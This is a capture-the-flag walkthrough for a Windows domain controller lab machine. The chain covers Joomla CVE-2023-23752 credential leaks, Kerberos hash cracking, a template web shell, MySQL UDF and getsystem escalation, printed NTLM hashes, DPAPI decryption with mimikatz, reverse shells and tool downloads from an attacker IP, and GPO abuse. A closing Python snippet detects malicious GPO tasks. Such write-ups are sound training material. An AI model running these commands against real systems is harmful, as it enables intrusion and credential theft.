Basic information

Port scan

80, 443, and some of the usual domain ports:

$ nmap -sC -sV 10.10.11.3
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 13:39 CST
Nmap scan report for 10.10.11.3
Host is up (0.86s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-18 14:07:15Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-time:
| date: 2024-02-18T14:08:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1740.19 seconds

80

A blog about movies:

Directory scan

The directory scan turns up a number of directories:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.3/ -x php

/Images (Status: 301) [Size: 334] [--> http://10.10.11.3/Images/]
/Media (Status: 301) [Size: 333] [--> http://10.10.11.3/Media/]
/TMP (Status: 301) [Size: 331] [--> http://10.10.11.3/TMP/]
/administrator (Status: 301) [Size: 341] [--> http://10.10.11.3/administrator/]
/api (Status: 301) [Size: 331] [--> http://10.10.11.3/api/]
...
/cache (Status: 301) [Size: 333] [--> http://10.10.11.3/cache/]
/components (Status: 301) [Size: 338] [--> http://10.10.11.3/components/]
/configuration.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 334] [--> http://10.10.11.3/images/]
/includes (Status: 301) [Size: 336] [--> http://10.10.11.3/includes/]
/language (Status: 301) [Size: 336] [--> http://10.10.11.3/language/]
/index.php (Status: 200) [Size: 24214]
/media (Status: 301) [Size: 333] [--> http://10.10.11.3/media/]
/modules (Status: 301) [Size: 335] [--> http://10.10.11.3/modules/]
/plugins (Status: 301) [Size: 335] [--> http://10.10.11.3/plugins/]
/robots.txt (Status: 200) [Size: 764]
/templates (Status: 301) [Size: 337] [--> http://10.10.11.3/templates/]

administrator

Visiting /administrator shows that this is Joomla:

joomla

Reference:

First confirm the version:

http://10.10.11.3/administrator/manifests/files/joomla.xml

4.2.7

CVE-2023-23752

Then search for the vulnerability matching that version:

No script is actually needed; just request the corresponding URLs directly. The database password is in the config response:

http://10.10.11.3/api/index.php/v1/users?public=true
http://10.10.11.3/api/index.php/v1/config/application?public=true

"username":"Administrator","email":"Administrator@holography.htb"
"password":"H0lOgrams4reTakIng0Ver754!"

But this username/password pair does not log in to Joomla.

user enum

The scan showed this is a domain environment, so do the usual username enumeration:

./kerbrute_darwin_amd64 userenum --dc 10.10.11.3 -d office.htb /Users/miao/Tools/dict/SecLists/Usernames/xato-net-10-million-usernames-dup.txt

2024/02/18 13:58:17 > [+] VALID USERNAME: administrator@office.htb
2024/02/18 14:03:22 > [+] VALID USERNAME: Administrator@office.htb
2024/02/18 14:05:53 > [+] VALID USERNAME: ewhite@office.htb
2024/02/18 14:05:53 > [+] VALID USERNAME: etower@office.htb
2024/02/18 14:05:54 > [+] VALID USERNAME: dwolfe@office.htb
2024/02/18 14:05:57 > [+] VALID USERNAME: dmichael@office.htb
2024/02/18 14:05:57 > [+] VALID USERNAME: dlanor@office.htb
2024/02/18 15:07:14 > [+] VALID USERNAME: hhogan@office.htb

SMB

Trying these usernames against the password obtained so far yields one valid combination:

dwolfe
H0lOgrams4reTakIng0Ver754!

Then use this valid account to browse SMB; a pcap file is found in the SOC Analysis share:

python3 ~/Tools/impacket/examples/smbclient.py dwolfe:'H0lOgrams4reTakIng0Ver754!'@10.10.11.3

# shares
ADMIN$
C$
IPC$
NETLOGON
SOC Analysis
SYSVOL
# use SOC Analysis
# ls
drw-rw-rw- 0 Thu May 11 02:52:24 2023 .
drw-rw-rw- 0 Wed Feb 14 18:18:31 2024 ..
-rw-rw-rw- 1372860 Thu May 11 02:51:42 2023 Latest-System-Dump-8fbc124d.pcap
# get Latest-System-Dump-8fbc124d.pcap

pcap

Opening the pcap file, there is a Kerberos AS-REQ in it:

So we can extract the corresponding hash and crack it offline:

tshark -r ./Latest-System-Dump-8fbc124d.pcap -Y "kerberos.msg_type == 10 && kerberos.cipher && kerberos.realm && kerberos.CNameString" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher -E separator=$

tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

# fix up the format
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

# crack the password
sudo hashcat -m 19900 hash.txt ~/Tools/dict/rockyou.txt

playboy69

Joomla again

Back to Joomla: the Administrator password on the Joomla site is the password recovered from the tshark output in the previous step:

shell

Then it is the usual Joomla admin getshell: edit a template file, then browse to it to execute:

http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami

Bring in msf to make the later steps easier:

http://10.10.11.3/templates/cassiopeia/error.php?cmd=powershell.exe -nop -w hidden -e xxxx

meterpreter > execute -f notepad.exe
Process 105488 created.
meterpreter > migrate 105488

The resulting shell runs as web_account.

Unintended root

Since we already have the database password, go straight for a MySQL UDF:

# first create the plugin directory via the shell obtained from Joomla
C:\xampp\mysql>mkdir lib
C:\xampp\mysql>cd lib
C:\xampp\mysql\lib>mkdir plugin

use exploit/multi/mysql/mysql_udf_payload
# add a route so the target's local mysql is reachable through the session
msf6 exploit(multi/mysql/mysql_udf_payload) > route add 127.0.0.1 255.255.255.0 1
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 127.0.0.1
msf6 exploit(multi/mysql/mysql_udf_payload) > set PASSWORD H0lOgrams4reTakIng0Ver754!
# set the remaining options as usual
msf6 exploit(multi/mysql/mysql_udf_payload) > exploit

This shell is also web_account, but unlike the first one it has SeImpersonatePrivilege, so getsystem works in one shot (the technique number still has to be given manually):

meterpreter > getsystem -t 6

hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bdf51241ff49f8a2169bba26be8494ed:::
PPotts:1107:aad3b435b51404eeaad3b435b51404ee:b33adc3d2cc514aa321eec4366e6e778:::
HHogan:1108:aad3b435b51404eeaad3b435b51404ee:6a626de046afdb1ece5118d54649b347:::
EWhite:1109:aad3b435b51404eeaad3b435b51404ee:385b9b3fde7b0043a57628581d0ca79b:::
etower:1110:aad3b435b51404eeaad3b435b51404ee:b0281fa65adf3d6efbefde882d592379:::
dwolfe:1111:aad3b435b51404eeaad3b435b51404ee:04e1dc0b00ea7c7c4246eb9f46fa29dd:::
dmichael:1112:aad3b435b51404eeaad3b435b51404ee:5ddea8fee3355c5492d4c2a07c73f7d3:::
dlanor:1113:aad3b435b51404eeaad3b435b51404ee:8a3594633f2175cf1b74776d1ef0c7a8:::
tstark:1114:aad3b435b51404eeaad3b435b51404ee:89ff936c3824c0ece9003332532e6a23:::
web_account:1118:aad3b435b51404eeaad3b435b51404ee:4bd10b00cf88e55d444099f25ea8de25:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:0ddf0e8e5b48cf2085a16e86c1a3bf49:::

Intended user flag

The intended path continues from the web_account shell obtained via Joomla. We already have tstark's credentials from the pcap, so switch to that user and read the user flag from the desktop:

powershell -exec bypass -c "wget http://10.10.16.4:7777/RunasCs.exe" -o RunasCs.exe

RunasCs.exe tstark playboy69 cmd.exe -r 10.10.16.4:4446 -d office.htb

internal

Looking through the web root, there is also an internal site:

Checking listening ports (or the Apache config) reveals local port 8083:

C:\>netstat -anop tcp
TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 5032

Forward it out and browse to it:

powershell -exec bypass -c "wget http://10.10.16.4:7777/chisel.exe" -o chisel.exe

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse
# target
chisel.exe client 10.10.16.4:9999 R:8083:127.0.0.1:8083

It is an internal system,

and it allows uploading a résumé:

LibreOffice

Listing sessions shows ppotts logged on, and LibreOffice is installed; combined with the résumé upload, this presumably simulates ppotts automatically opening submitted résumés:

So the step is to upload a résumé carrying a macro (the Gofer machine used the same trick):

# path where uploads are stored
C:\xampp\htdocs\internal\applications

This gives a shell as ppotts.

hhogan

This one is a hint from the box author: checking cmdkey shows a stored entry for hhogan:

C:\Program Files\LibreOffice 5\program>cmdkey /list
cmdkey /list

Currently stored credentials:

Target: LegacyGeneric:target=MyTarget
Type: Generic
User: MyUser

Target: Domain:interactive=OFFICE\hhogan
Type: Domain Password
User: OFFICE\hhogan

But because it belongs to a different user it cannot be used directly; the stored data has to be decrypted:

DPAPI

Windows Credential Manager stores its credentials with DPAPI; decrypting them finally yields HHogan's password:

powershell -exec bypass -c "wget http://10.10.16.7:7777/mimikatz_2.2.0.exe -o C:\temp\mimikatz_2.2.0.exe"

mimikatz # vault::cred
mimikatz # vault::list

echo %appdata%
C:\Users\PPotts\AppData\Roaming

dir /a:h C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
# this part is tricky: there are three blobs, only the two from 2023 contain data, the last one from 2024 is empty
05/09/2023 01:08 PM 358 18A1927A997A794B65E9849883AC3F3E
05/09/2023 03:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
01/18/2024 11:53 AM 374 E76CCA3670CD9BB98DF79E0A8D176F1E


mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}

wmic useraccount get name,sid
PPotts S-1-5-21-1199398058-4196589450-691661856-1107


mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

UserName : OFFICE\HHogan
CredentialBlob : H4ppyFtW183#

run post/windows/manage/run_as_psh user=HHogan pass=H4ppyFtW183# domain=office.htb

GPO Abuse & root flag

HHogan is in the GPO Managers group, which clearly points to GPO abuse; BloodHound confirms it as well:

evil-winrm -i 10.10.11.3 -u HHogan -p 'H4ppyFtW183#'

upload SharpGPOAbuse.exe

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author office\Administrator --Command "cmd.exe" --Arguments "/c C:\temp\miao.exe" --GPOName "DEFAULT DOMAIN CONTROLLERS POLICY"
# refresh group policy to trigger execution
gpupdate /force

This gives SYSTEM.
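From the defender's side, the immediate scheduled task pushed above is written into the GPO's ScheduledTasks.xml in SYSVOL, and that file is where a review of a policy like the Default Domain Controllers Policy would catch it. The following Python is an added example, not part of the original writeup: it parses a Group Policy Preferences ScheduledTasks.xml and flags the ImmediateTaskV2 entries worth escalating; the sample XML is constructed here and the SYSVOL path in the comment is an assumption.

```python
"""Defensive check: review ImmediateTaskV2 entries in a GPP ScheduledTasks.xml."""
import xml.etree.ElementTree as ET

# Constructed sample (not taken from the target). Assumed location of the real file:
# \\<domain>\SYSVOL\<domain>\Policies\{GPO-GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="Update" changed="2024-02-18 14:00:00">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>office\Administrator</Author></RegistrationInfo>
        <Actions Context="Author">
          <Exec><Command>cmd.exe</Command><Arguments>/c C:\temp\miao.exe</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Interpreters and user-writable locations that make a pushed task worth escalating.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WRITABLE_HINTS = ("\\temp\\", "\\users\\public\\", "\\programdata\\")


def parse_immediate_tasks(xml_text):
    """Return one dict per ImmediateTaskV2 (name, change time, author, runAs, command)."""
    tasks = []
    for node in ET.fromstring(xml_text).iter("ImmediateTaskV2"):
        props = node.find("Properties")
        exec_ = node.find("./Properties/Task/Actions/Exec")
        tasks.append({
            "name": node.get("name", ""),
            "changed": node.get("changed", ""),
            "run_as": props.get("runAs", "") if props is not None else "",
            "author": (node.findtext("./Properties/Task/RegistrationInfo/Author") or "").strip(),
            "command": (exec_.findtext("Command") or "") if exec_ is not None else "",
            "arguments": (exec_.findtext("Arguments") or "") if exec_ is not None else "",
        })
    return tasks


def suspicious_reasons(task):
    """Every immediate task deserves a look; these heuristics add severity."""
    reasons = []
    exe = task["command"].rsplit("\\", 1)[-1].lower()
    if exe in SHELLS:
        reasons.append(f"task command is an interpreter ({exe})")
    if "system" in task["run_as"].lower():
        reasons.append("runs as SYSTEM")
    if any(h in task["arguments"].lower() for h in WRITABLE_HINTS):
        reasons.append("launches a binary from a user-writable path")
    return reasons
```

Diffing the `changed` timestamp and `Author` against the change-control record for the GPO is usually enough to separate a legitimate push from one like the task above.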

root flag

Administrator's desktop:

References